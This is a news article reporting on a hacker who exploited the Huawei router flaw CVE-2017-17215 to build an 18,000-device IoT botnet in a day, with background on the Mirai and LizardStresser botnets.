IoT hacker builds Huawei-based botnet, enslaves 18,000 devices in one day

A hacker has taken only 24 hours to build a botnet which is at least 18,000-devices strong.
Written by Charlie Osborne, Contributing Writer

How long does it take to build a botnet? Not long, if you consider Anarchy's 18,000-device-strong creation, brought to life in only 24 hours.

First spotted by researchers from NewSky Security, as reported by Bleeping Computer, other security firms including Rapid7 and Qihoo 360 Netlab quickly jumped on the case and confirmed the existence of the new threat.

The security teams realized there has been a huge recent uptick in Huawei device scanning.

The traffic surge was due to scans seeking devices vulnerable to CVE-2017-17215, a critical security flaw which can be exploited through port 37215.

Scans to find routers vulnerable to the issue began on 18 July.

If a Huawei router is exploited in this fashion, attackers can send malicious packets of data, launch attacks against the device, and remotely execute code -- which can be crafted in order to control, enslave, and add these devices to botnets.

Botnets are the creation of vast networks full of enslaved devices, which can include standard PCs, routers, smartphones, and a more recent addition, the compromise of Internet of Things (IoT) devices ranging from smart lights to fridges.

The LizardStresser botnet, a distributed denial-of-service (DDoS)-for-hire system, for example, was able to launch 400Gbps attacks thanks to our vulnerable IoT devices.

After the source code was released to the public in 2015, LizardStresser botnet variants were discovered which targeted IoT products use telnet brute-force logins to random IP addresses with a hard-coded list of user credentials.

Hard-coded credentials are a common problem with IoT products even today, and all it often takes is a simple scanner to compromise such devices.

TechRepublic: Why hardware security is critical for IoT

In the case of the new Huawei-based botnet, a hacker calling themselves "Anarchy" has claimed responsibility, according to NewSky Security's Ankit Anubhav.

The cyberattacker claims to have used the old CVE-2017-17215 vulnerability to compromise at least 18,000 Huawei routers. The hacker revealed an IP list of victims to the security researcher which has not been made public.

The working exploit code to compromise Huawei routers using this known flaw was released to the public in January this year. The code was used in the Satori and Brickerbot botnets, as well as a string of variants which were based on the infamous Mirai botnet, which is still going strong.

See also: IBM: A data breach will now cost your organization $3.86 million, if you're lucky

Mirai was utilized in 2016 to disrupt Internet services across the US on a scale we had not experienced before.

While the motives have not been made clear, the hacker told Anubhav that they wanted to make "the biggest, baddest botnet in town," which may suggest we could have another LizardStresser scenario on our hands in the future, in which another botnet will be used in targeted attacks -- or even be made available for hire.

"It's painfully hilarious how attackers can construct big bot armies with known vulns," the security researcher added.

Anubhav suspects that Anarchy may be the same hacker known as Wicked, who has been linked with the creation of the Owari/Sora botnets.

The story may not be over. Anarchy/Wicked told the researcher that they also intend to start a scan for Realtek router vulnerability CVE-2014-8361, in order to enslave more devices.

CNET: We can't stop botnet attacks alone, says US government report

A basic guide to diving in to the dark web

Previous and related coverage

Editorial standards